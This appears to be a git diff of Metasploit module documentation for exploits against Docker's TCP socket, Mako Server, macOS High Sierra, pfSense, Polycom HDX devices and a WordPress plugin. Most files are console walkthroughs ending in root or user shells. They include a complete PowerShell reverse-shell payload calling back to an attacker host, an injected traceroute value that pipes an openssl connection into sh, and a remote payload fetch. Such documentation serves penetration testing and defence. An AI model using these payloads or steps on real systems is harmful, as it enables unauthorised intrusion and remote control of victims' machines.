@@ -67,6 +67,8 @@ OK [Disable][5] or [protect][6] the Docker tcp socket. +[User namespaces][7] did **not** protect against this. + # Exploitation This module is designed for the attacker to leverage, creation of a Docker container with out authentication through the Docker tcp socket @@ -88,8 +90,8 @@ to gain root access to the hosting server of the Docker container. msf > use exploit/linux/http/docker_daemon_tcp msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23 RHOST => 192.168.66.23 -msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp -PAYLOAD => python/meterpreter/reverse_tcp +msf exploit(docker_daemon_tcp) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +PAYLOAD => linux/x64/meterpreter/reverse_tcp msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10 LHOST => 192.168.66.10 msf exploit(docker_daemon_tcp) > set VERBOSE true @@ -108,18 +110,17 @@ msf exploit(docker_daemon_tcp) > run [*] Waiting for the cron job to run, can take up to 60 seconds [*] Waiting until the docker container stopped [*] The docker container has been stopped, now trying to remove it -[*] Sending stage (40411 bytes) to 192.168.66.23 +[*] Sending stage (2878936 bytes) to 192.168.66.23 [*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200 [+] Deleted /etc/cron.d/lVoepNpy [+] Deleted /tmp/poasDIuZ meterpreter > sysinfo -Computer : debian -OS : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) -Architecture : x64 -System Language : en_US -Meterpreter : python/linux +Computer : rancher +OS : Debian 9.1 (Linux 4.9.0-3-amd64) +Architecture : x64 +Meterpreter : x64/linux meterpreter > ``` @@ -129,3 +130,4 @@ meterpreter > [4]:https://docs.docker.com/engine/admin/systemd/ [5]:https://docs.docker.com/engine/reference/commandline/dockerd/#options [6]:https://docs.docker.com/engine/security/https/ +[7]:https://docs.docker.com/engine/security/userns-remap/#disable-namespace-remapping-for-a-container 
diff --git a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md new file mode 100644 index 0000000000..5732e42b71 --- /dev/null +++ b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md 
@@ -0,0 +1,251 @@ +## Description + + This module exploits a vulnerability found in Mako Server v2.5, 2.6. + It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. + + Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 + +## Vulnerable Application + + [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. + + This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS: + - v2.5 + - v2.6 + + Links: + - [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe) + - [Windows download page](https://makoserver.net/download/windows) + - [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz) + - [Linux download page](https://makoserver.net/download/linux-x86) + - [Documentation](https://makoserver.net/download/manual) + +## References for vulnerability + - https://blogs.securiteam.com/index.php/archives/3391 + - https://www.exploit-db.com/exploits/42683 + +## Verification Steps for Windows + + 1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) + 2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop + 4. Start msfconsole on host + 5. Do: ```use exploit/multi/http/makoserver_cmd_exec``` + 6. Do: ```set RHOST ``` + 7. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` + 8. Do: ```set LHOST ``` + 9. Do: ```exploit``` + 10. You should get a Windows command shell + +## Verification Steps for Linux + + 1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work) + 2. From inside the extracted folder, do ```./rundemo.sh``` + 4. Start msfconsole on host + 5. 
Do: ```use exploit/multi/http/makoserver_cmd_exec``` + 6. Do: ```set RHOST ``` + 7. Do: ```set PAYLOAD cmd/unix/python_reverse``` + 8. Do: ```set LHOST ``` + 9. Do: ```exploit``` + 10. You should get a Linux command shell (may need to wait ~30 seconds) + +## Example Output +``` +msf > use exploit/multi/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... +[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Example Verbose Output +``` +msf > use exploit/multi/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set VERBOSE true +VERBOSE => true +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > check + +[*] Trying to detect running Mako Server and necessary files... +[*] Mako Server save.lsp returns correct ouput. +[*] 10.10.10.3:80 The target appears to be vulnerable. +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... 
+[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]]) +[*] Sending PUT request to save.lsp... +[*] Sending GET request to manage.lsp... +[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
+ +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Scenarios + +### Targeting Windows 7 SP1 x64 running Mako Server v2.5 + + A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: + + ``` + msf > use exploit/multi/http/makoserver_cmd_exec + msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 + RHOST => 10.10.10.2 + msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell + PAYLOAD => cmd/windows/reverse_powershell + msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 + LHOST => 10.10.10.4 + msf exploit(makoserver_cmd_exec) > check + [*] 10.10.10.2:80 The target appears to be vulnerable. + msf exploit(makoserver_cmd_exec) > exploit + + [*] Started reverse TCP handler on 10.10.10.4:4444 + [*] Sending payload to target... + [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400 + + Microsoft Windows + Copyright (c) Microsoft Corporation. All rights reserved. + + C:\Users\Smith\Downloads\MakoServer>^Z + Background session 1? [y/N] y + msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + msf post(shell_to_meterpreter) > set SESSION 1 + SESSION => 1 + msf post(shell_to_meterpreter) > set LPORT 8080 + LPORT => 8080 + msf post(shell_to_meterpreter) > exploit + + [*] Upgrading session ID: 1 + [*] Starting exploit/multi/handler + [*] Started reverse TCP handler on 10.10.10.4:8080 + [-] Powershell is not installed on the target. + [*] Command stager progress: 1.66% (1699/102108 bytes) + ... 
+ [*] Command stager progress: 100.00% (102108/102108 bytes) + [*] Post module execution completed + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2) + 2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2) + + msf post(shell_to_meterpreter) > sessions -i 2 + [*] Starting interaction with 2... + + meterpreter > getuid + Server username: smith-PC\smith + meterpreter > sysinfo + Computer : SMITH-PC + OS : Windows 7 (Build 7601, Service Pack 1). + Architecture : x64 + System Language : en_US + Domain : WORKGROUP + Logged On Users : 2 + Meterpreter : x86/windows + ``` + +### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5 + + A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session: + + ``` + msf > use exploit/multi/http/makoserver_cmd_exec + msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 + RHOST => 10.10.10.2 + msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python + PAYLOAD => cmd/unix/reverse_python + msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4 + LHOST => 10.10.10.4 + msf exploit(makoserver_cmd_exec) > check + [*] 10.10.10.2:80 The target appears to be vulnerable. + msf exploit(makoserver_cmd_exec) > exploit + + [*] Started reverse TCP handler on 10.10.10.4:4444 + [*] Sending payload to target... + [*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500 + + ls + LICENSE.txt + mako + mako.zip + README.txt + rundemo.sh + tutorial + ^Z + Background session 1? 
[y/N] y + msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2) + + msf post(shell_to_meterpreter) > set SESSION 1 + SESSION => 1 + msf post(shell_to_meterpreter) > set LPORT 8080 + LPORT => 8080 + msf post(shell_to_meterpreter) > exploit + + [*] Upgrading session ID: 1 + [*] Starting exploit/multi/handler + [*] Started reverse TCP handler on 10.10.10.4:8080 + [*] Sending stage (847604 bytes) to 10.10.10.2 + [*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500 + [*] Command stager progress: 100.00% (736/736 bytes) + [*] Post module execution completed + msf post(shell_to_meterpreter) > sessions -l + + Active sessions + =============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2) + 2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2 10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2) + msf post(shell_to_meterpreter) > sessions -i 2 + [*] Starting interaction with 2... + + meterpreter > getuid + Server username: uid=1000, gid=1000, euid=1000, egid=1000 + meterpreter > sysinfo + Computer : 10.10.10.2 + OS : Ubuntu 16.04 (Linux 4.10.0-35-generic) + Architecture : x64 + Meterpreter : x86/linux + ``` diff --git a/documentation/modules/exploit/osx/local/root_no_password.md b/documentation/modules/exploit/osx/local/root_no_password.md new file mode 100644 index 0000000000..ac793fa6fa --- /dev/null +++ b/documentation/modules/exploit/osx/local/root_no_password.md 
@@ -0,0 +1,104 @@ +## Vulnerable Application +This vulnerability works against OSX 10.13 (High Sierra). Early +research (https://objective-see.com/blog/blog_0x24.html) suggests that +the vulnerability is the result of multiple errors ultimately started by +an incorrect return value from triggered by the function +`od_verify_crypt_password` returning true even if the account is +disabled. The subsequent function calls appear to validate and create +the password, though there is still a lot of research into the bug and +these results should be verified once more research has been published. + +## Verification Steps +1. Get a session on a vulnerable system +2. `use exploit/osx/local/root_no_password` +3. `set lhost ` +4. `set lport ` +5. `set session ` +6. `run` + +## Scenarios +### Example Run +``` +msf exploit(psexec) > use exploit/multi/handler +msf exploit(handler) > set payload osx/x64/meterpreter_reverse_tcp +payload => osx/x64/meterpreter_reverse_tcp +msf exploit(handler) > set lhost +lhost => +msf exploit(handler) > set lport 4567 +lport => 4567 +msf exploit(handler) > run + +[*] Started reverse TCP handler on :4567 +httpserver[*] Meterpreter session 1 opened (:4567 -> :49347) at 2017-11-29 07:28:32 -0600 + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=501, gid=20, euid=501, egid=20 +meterpreter > background +[*] Backgrounding session 1... +msf exploit(handler) > use exploit/osx/local/root_no_password +msf exploit(root_no_password) > show options + +Module options (exploit/osx/local/root_no_password): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION yes The session to run this module on. 
+ + +Payload options (osx/x64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Mac OS X 10.13.1 High Sierra x64 (Native Payload) + + +msf exploit(root_no_password) > set lhost +lhost => +msf exploit(root_no_password) > set lport 4562 +lport => 4562 +msf exploit(root_no_password) > set session 1 +session => 1 +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/cinbvsmrmyxw' +[*] Meterpreter session 2 opened (:4562 -> :62522) at 2017-11-29 07:29:56 -0600 +[*] - Meterpreter session 2 closed. Reason: Died + + +[*] Executing payload file as '/tmp/cinbvsmrmyxw' +[!] This exploit may require manual cleanup of '/tmp/cinbvsmrmyxw' on the target + +[-] Invalid session identifier: 2 +msf exploit(root_no_password) > +msf exploit(root_no_password) > +msf exploit(root_no_password) > run + +[*] Started reverse TCP handler on :4562 +[*] Writing payload file as '/tmp/imtjkakowanv' +[*] Executing payload file as '/tmp/imtjkakowanv' +[*] Meterpreter session 3 opened (:4562 -> :49348) at 2017-11-29 07:30:53 -0600 +[+] Deleted /tmp/imtjkakowanv + +meterpreter > sysinfo +Computer : msfusers-Mac.local +OS : (MacOSX 17.0.0) +Architecture : x64 +Meterpreter : x64/osx +meterpreter > getuid +Server username: uid=0, gid=20, euid=0, egid=20 +meterpreter > +``` diff --git a/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md b/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md new file mode 100644 index 0000000000..9f8d0343f8 --- /dev/null +++ b/documentation/modules/exploit/unix/http/pfsense_group_member_exec.md 
@@ -0,0 +1,114 @@ +## Description + + This module exploits a vulnerability in pfSense version 2.3 and before which allows an authenticated user to execute arbitrary operating system commands + as root. + + This module has been tested successfully on version 2.3-RELEASE, and 2.2.6. + + +## Vulnerable Application + + This module has been tested successfully on version CE 2.3 amd64, and 2.2.6 amd64. + + Installer: + + * [pfSense CE 2.3](https://nyifiles.pfsense.org/mirror/downloads/old/pfSense-CE-2.3-RELEASE-amd64.iso.gz) + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use exploit/unix/http/pfsense_group_member_exec` + 3. Do: `set rhost [IP]` + 4. Do: `set username [username]` + 5. Do: `set password [password]` + 6. Do: `exploit` + 7. You should get a session + + +## Sample Output + +### 2.3-Release amd64 + +``` +[*] Processing pfsense.rc for ERB directives. +resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec +resource (pfsense.rc)> set rhost 2.2.2.2 +rhost => 2.2.2.2 +resource (pfsense.rc)> set verbose true +verbose => true +resource (pfsense.rc)> set lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (pfsense.rc)> check +[*] 2.2.2.2:443 The target service is running, but could not be validated. +resource (pfsense.rc)> exploit +[*] Started reverse double SSL handler on 1.1.1.1:4444 +[*] CSRF Token for login: sid:a11be2ee5849522898e2c1ff23739b35c76435bf,1510545358;ip:d70924f708189287bdee1e08d7fa83758a0e1f68,1510545358 +[*] Successful Authentication +[*] pfSense Version Detected: 2.3-RELEASE +[+] Login Successful +[*] CSRF Token for group creation: sid:823a6f854ad1bae307c2959e95ccc98a8d72f2c1,1510545361 +[*] Manual removal of group aJPEfJLDKT is required. +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 5ER6rqZOjOSGjRml; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "5ER6rqZOjOSGjRml\n" +[*] Matching... 
+[*] B is input... +[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:25824) at 2017-11-19 08:15:00 -0500 + +whoami +root +uname -a +FreeBSD . 10.3-RELEASE FreeBSD 10.3-RELEASE #6 05adf0a(RELENG_2_3_0): Mon Apr 11 18:52:07 CDT 2016 root@ce23-amd64-builder:/builder/pfsense-230/tmp/obj/builder/pfsense-230/tmp/FreeBSD-src/sys/pfSense amd64 +``` +### 2.2.6 amd64 + +``` +[*] Processing pfsense.rc for ERB directives. +resource (pfsense.rc)> use exploit/unix/http/pfsense_group_member_exec +resource (pfsense.rc)> set rhost 3.3.3.3 +rhost => 3.3.3.3 +resource (pfsense.rc)> set verbose true +verbose => true +resource (pfsense.rc)> set lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (pfsense.rc)> check +[*] 3.3.3.3:443 The target is not exploitable. +resource (pfsense.rc)> exploit +[*] Started reverse double SSL handler on 1.1.1.1:4444 +[*] CSRF Token for login: sid:bb80526160efcf79d8660d1a31f6bf88e154b38e,1511091712;ip:42d05b73fc9b2d31c54333a60fd308dfbd4da97a,1511091712 +[*] Successful Authentication +[*] pfSense Version Detected: 2.2.6-RELEASE +[+] Login Successful +[*] CSRF Token for group creation: sid:d49a6dc5b7e98c92a7772c605af3586a1f3adc75,1511091715 +[*] Manual removal of group okUPTvzysL is required. +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 7hKg6oD9DkwXYRtt; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "7hKg6oD9DkwXYRtt\n" +[*] Matching... +[*] A is input... +[*] Command shell session 1 opened (1.1.1.1:4444 -> 3.3.3.3:34403) at 2017-11-19 06:42:00 -0500 + +whoami +root +uname -a +FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64 +``` + +## Cleanup + +Manual cleanup is required. The group name is printed during exploitation. 
+ +## Logging + +Logging into the web interface writes a line to the system out on the console similar to: `pfSense php-fpm[72834]: /index.php: Succeessful login for user 'admin' from [ip]` diff --git a/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md new file mode 100644 index 0000000000..94d04ca2f0 --- /dev/null +++ b/documentation/modules/exploit/unix/misc/polycom_hdx_traceroute_exec.md 
@@ -0,0 +1,131 @@ +Within Polycom HDX series devices, there is a command execution vulneralbility in one of the dev commands `devcmds`, `lan traceroute` which subtituing `$()` or otherwise similiar operand , similiar to [polycom_hdx_auth_bypass](https://github.com/rapid7/metasploit-framework/blob/f250e15b6ee2d7b3e38ee1229bee533a021d1415/modules/exploits/unix/polycom_hdx_auth_bypass.rb) could allow for an attacker to obtain a command shell. Spaces must be replaced with `#{IFS}` aka `Internal Field Seperator` + + +## Vulnerable Application +Tested on the latest and greatest version of the firmware, vendor has not patched since being reported. [Found here](http://downloads.polycom.com/video/hdx/polycom-hdx-release-3.1.10-51067.pup) + +## Options +### PASSWORD +Although a majority of devices come without a password, occasionally when one is required, you can set one to either the default `456`, `admin`, or `POLYCOM`, or +the devices. + + +## Payloads +Supported payloads include the telnet payload `cmd/unix/reverse` but not `cmd/unix/reverse_ssl_double_telnet` Alternatively, `cmd/unix/reverse_openssl` can be used or, your own choice of executing any arbitary command with `cmd/unix/generic` + +``` +Compatible Payloads +=================== + + Name Disclosure Date Rank Description + ---- --------------- ---- ----------- + cmd/unix/generic normal Unix Command, Generic Command Execution + cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) + cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) + cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) +``` + +## Verification Steps + +A successful check of the exploit will look like this: +``` +msf exploit(polycom) > set RHOST 192.168.0.17 +RHOST => 192.168.0.17 +msf exploit(polycom) > set LHOSt ens3 +LHOSt => ens3 +msf exploit(polycom) > set LPORT 3511 +LPORT => 3511 +msf exploit(polycom) > show payloads + +Compatible Payloads 
+=================== + + Name Disclosure Date Rank Description + ---- --------------- ---- ----------- + cmd/unix/generic normal Unix Command, Generic Command Execution + cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) + cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) + cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) + +msf exploit(polycom) > set PAYLOAD cmd/unix/reverse +PAYLOAD => cmd/unix/reverse +msf exploit(polycom) > set VERBOSE false +VERBOSE => false +msf exploit(polycom) > run + +[*] Started reverse TCP double handler on 192.168.0.11:3511 +[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent! +[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:34874... +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo vGopPRp0jBxt4J2D; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket B +[*] B: "vGopPRp0jBxt4J2D\n" +[*] Matching... +[*] A is input... +[*] Command shell session 10 opened (192.168.0.11:3511 -> 192.168.0.17:37687) at 2017-11-15 10:29:58 -0500 +[*] 192.168.0.17:23 - Shutting down payload stager listener... + +id +uid=0(root) gid=0(root) +whoami +root +``` + +## Debugging +Setting `VERBOSE` to true should yield an output of. + +``` +msf exploit(polycom) > set VERBOSE true +VERBOSE => true +rmsf exploit(polycom) > run + +[*] Started reverse TCP double handler on 192.168.0.11:3511 +[*] 192.168.0.17:23 - Received : ! 
+Polycom Command Shell +XCOM host: localhost port: 4121 +TTY name: /dev/pts/6 +Session type: telnet +2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: freeing conn [conn: 0x1266f300] [sock: 104] [thread: 0x12559e68] +2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: SessionHandler: freeing session 4340 +2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession(sess: 4340) +2017-11-15 15:33:12 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: deleteSession current open sessions count= 9 +2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:main_server_thread: new connection [conn: 0x1266f300] [sock: 104] +2017-11-15 15:33:12 DEBUG avc: pc[0]: XCOM:INFO:server_thread_handler: new conn [conn: 0x1266f300] [sock: 104] [thread: 0x1255a010] [TID: 3380] +2017-11-15 15:33:12 DEBUG avc: pc[0]: uimsg: [R: telnet /tmp/apiasynclisteners/psh6 /dev/pts/6] +2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession(type: telnet sess: 4342) +2017-11-15 15:33:13 DEBUG jvm: pc[0]: UI: xcom-api: ClientManager: createSession current open sessions count= 10 +2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: register_api_session pSession=0x12669918 +2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: about to call sendJavaMessageEx +2017-11-15 15:33:13 DEBUG avc: pc[0]: appcom: session 4342 registered + +[+] 192.168.0.17:23 - 192.168.0.17:23 - Device has no authentication, excellent! +[+] 192.168.0.17:23 - Sending payload of 126 bytes to 192.168.0.17:37450... +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo WD3QloY3fys6n7dK; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] 192.168.0.17:23 - devcmds +Entering sticky internal commands *ONLY* mode... 
+lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` +2017-11-15 15:33:13 DEBUG avc: pc[0]: uimsg: [D: lan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh`] +2017-11-15 15:33:13 DEBUG avc: pc[0]: os: task:DETR pid:3369 thread 4e5ff4c0 11443 12660c68 +2017-11-15 15:33:14 INFO avc: pc[0]: DevMgrEther: Trace Route Command Entry, hostnameORIP: `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}192.168.0.11${IFS}-port${IFS}37873|sh` hop_count: 0 + +[*] Reading from socket B +[*] B: "WD3QloY3fys6n7dK\n" +[*] Matching... +[*] A is input... +[*] Command shell session 11 opened (192.168.0.11:3511 -> 192.168.0.17:38624) at 2017-11-15 10:34:23 -0500 +[*] 192.168.0.17:23 - Shutting down payload stager listener... + +id +uid=0(root) gid=0(root) +whoami +root +``` diff --git a/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md new file mode 100644 index 0000000000..5443e074ee --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md 
@@ -0,0 +1,63 @@ +## Vulnerable Application + + wp-mobile-detector is a wordpress plugin which was removed from the wordpress site after this vulnerability + was disclosed. Version 3.5 and earlier can be directed to upload a file from a remote web server, and then + the file can be executed by the client. + + Download [wp-mobile-detector](https://www.exploit-db.com/apps/bf8bdbac0b01e14788aa2d4a0d9c6971-wp-mobile-detector.3.5.zip) + from Exploit-db since wordpress removed it. + + Due to its age, it may be difficult to install. The install for the scenario later is: + + * Ubuntu 16.04.2 + * Apache 2.4.18 + * PHP 7 + * Wordpress 4.4.2 + +## Verification Steps + + Example steps in this format (is also in the PR): + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/unix/webapp/wp_mobile_detector_upload_execute``` + 4. Do: ```set rhost [ip]``` + 5. Do: ```set lhost [ip]``` + 6. Do: ```set srvhost [ip]``` + 7. Do: ```exploit``` + 8. You should get a shell. + +## Scenarios + +### wp-mobile-detector 3.5 on Wordpress 4.4.2 + + ``` + msf > use exploit/unix/webapp/wp_mobile_detector_upload_execute + msf exploit(wp_mobile_detector_upload_execute) > set rhost 2.2.2.2 + rhost => 2.2.2.2 + msf exploit(wp_mobile_detector_upload_execute) > set TARGETURI /wordpress/ + TARGETURI => /wordpress/ + msf exploit(wp_mobile_detector_upload_execute) > check + [*] 2.2.2.2:80 The target appears to be vulnerable. + msf exploit(wp_mobile_detector_upload_execute) > set payload php/meterpreter/reverse_tcp + payload => php/meterpreter/reverse_tcp + smsf exploit(wp_mobile_detector_upload_execute) > set lhost 1.1.1.1 + lhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > set srvhost 1.1.1.1 + srvhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > exploit + [*] Exploit running as background job 2. 
+ + [*] Started reverse TCP handler on 1.1.1.1:4444 + msf exploit(wp_mobile_detector_upload_execute) > [*] Starting Payload Server + [*] Using URL: http://1.1.1.1:8080/ZWTgqwsiFL.php + [*] Uploading payload via /wordpress/wp-content/plugins/wp-mobile-detector/resize.php?src=http://1.1.1.1:8080/ZWTgqwsiFL.php + [+] Payload requested on server, sending + [+] Sleeping 5 seconds for payload upload + [*] Executing the payload via /wordpress/wp-content/plugins/wp-mobile-detector/cache/ZWTgqwsiFL.php + [*] Sending stage (37514 bytes) to 2.2.2.2 + [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:47064) at 2017-10-20 22:54:04 -0400 + [+] Deleted ZWTgqwsiFL.php + [*] Server stopped. + ``` + diff --git a/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md new file mode 100644 index 0000000000..51f8bd7813 --- /dev/null +++ b/documentation/modules/exploit/windows/fileformat/office_ms17_11882.md 
